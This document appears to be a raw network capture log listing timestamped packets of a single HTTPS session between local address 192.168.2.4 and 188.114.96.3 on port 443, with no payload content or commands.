Jan 1, 2025 17:10:06.056667089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.056824923 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056838989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.056844950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056868076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.056901932 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.057013035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.057013035 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.057018995 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057358027 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057374001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057465076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057495117 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.057503939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057533026 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.057596922 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057725906 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.057733059 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057969093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.057987928 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.058032990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.058039904 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.058065891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.058162928 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.058197975 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.058228016 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.058234930 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.058264017 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.058286905 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.114253044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114330053 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114362955 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.114375114 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114386082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114418983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.114427090 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114458084 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.114784956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114804983 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114870071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.114988089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.115020990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.115031004 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.115060091 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.115119934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.146869898 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.146893978 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.146934032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.146976948 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.146986008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147017956 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147226095 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147289038 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147336960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147342920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147372007 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147392988 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147429943 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147437096 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147466898 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147542000 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147706032 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147743940 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147780895 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147788048 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.147819042 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.147847891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.148006916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.148077011 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.148108959 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.148113966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.148138046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.148209095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.148447037 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.148463011 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.148593903 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.148602009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.148694038 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.191080093 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.191142082 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.204649925 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.204780102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.204801083 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.204863071 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.204870939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205040932 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205157042 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.205163956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205235004 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.205488920 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205504894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205538034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205569983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.205569983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.205571890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205590010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.205605030 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.205636978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.205636978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.237479925 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.237495899 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.237627983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.237637043 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.237771988 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.237911940 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.237952948 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.237986088 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.237993956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238018990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238024950 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238054037 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238079071 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238084078 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238091946 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238107920 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238132000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238157034 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238164902 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238250971 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238641024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238683939 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238715887 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238720894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.238749981 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238799095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.238904953 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.239006996 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.288567066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.288609028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.288641930 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.288650990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.288681030 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.288865089 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295275927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295392990 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295397997 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295408964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295509100 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295516014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295598030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295691967 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295697927 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295727968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295787096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295793056 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295854092 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295865059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295871973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.295943022 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.295943022 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.296103001 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.296153069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.296181917 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.296189070 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.296264887 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.296320915 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.296375036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.296406984 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.296412945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.296444893 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.296483040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328044891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328119040 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328125000 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328138113 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328178883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328589916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328620911 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328650951 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328655958 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328681946 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328736067 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328790903 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328799009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328845978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.328958035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.328998089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329020977 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.329025030 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329052925 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.329308987 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329360008 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329366922 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.329372883 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329401016 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.329739094 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329757929 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.329811096 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.329823017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.374809027 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.379605055 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.379659891 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.385876894 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.385927916 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.385953903 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.385967016 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.385983944 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.386224985 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.386282921 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.386286020 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.386296034 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.386333942 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.386595011 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.386609077 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.386662960 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.386671066 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.386707067 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.418661118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.418675900 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.418731928 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.418745041 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.418761969 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.419008017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419020891 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419074059 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.419083118 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419389009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419403076 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419460058 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.419466019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419486046 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.419821024 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419836044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.419888973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.419898033 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.420274019 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.420289040 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.420344114 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.420351028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.468545914 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.470232010 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.470299006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.476533890 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.476547956 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.476603985 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.476615906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.476661921 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.476681948 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.476739883 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.476746082 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.476922035 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.476989031 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.476995945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.477258921 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.477307081 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.477317095 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.477324009 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.477363110 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.477375031 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.477473021 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.477530003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.517927885 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.517987967 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.517992973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518006086 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518029928 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518054962 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518115044 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518170118 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518485069 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518533945 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518546104 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518549919 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518574953 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518786907 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518846989 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.518852949 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.518961906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.519016027 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.519021988 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.519071102 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.519222021 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.519285917 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.519292116 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.519682884 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.519737005 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.519742966 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.519789934 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.520627022 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.520673990 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.520683050 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.520687103 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.520715952 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.520715952 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.520766973 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.520771980 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.520819902 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.560827017 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.560889006 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567235947 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567255974 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567286968 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567311049 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567322969 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567348003 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567363024 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567672014 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567719936 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567743063 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567749023 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567842007 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567871094 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567936897 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.567938089 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.567950964 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.568003893 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.568003893 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.568114042 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.568171978 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.608787060 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.608854055 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.609267950 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609288931 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609325886 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.609333992 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609345913 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609369993 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.609392881 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.609397888 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609493971 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.609740973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609796047 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.609802961 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.609853983 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.610203028 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.610259056 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.610342026 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.610400915 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.611145973 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.611208916 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.611409903 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.611462116 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.651396036 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.651465893 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.657584906 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.657644987 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.657650948 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.657664061 CET	443	49733	188.114.96.3	192.168.2.4
Jan 1, 2025 17:10:06.657701969 CET	49733	443	192.168.2.4	188.114.96.3
Jan 1, 2025 17:10:06.657778025 CET	443	49733	188.114.96.3	192.168.2.4
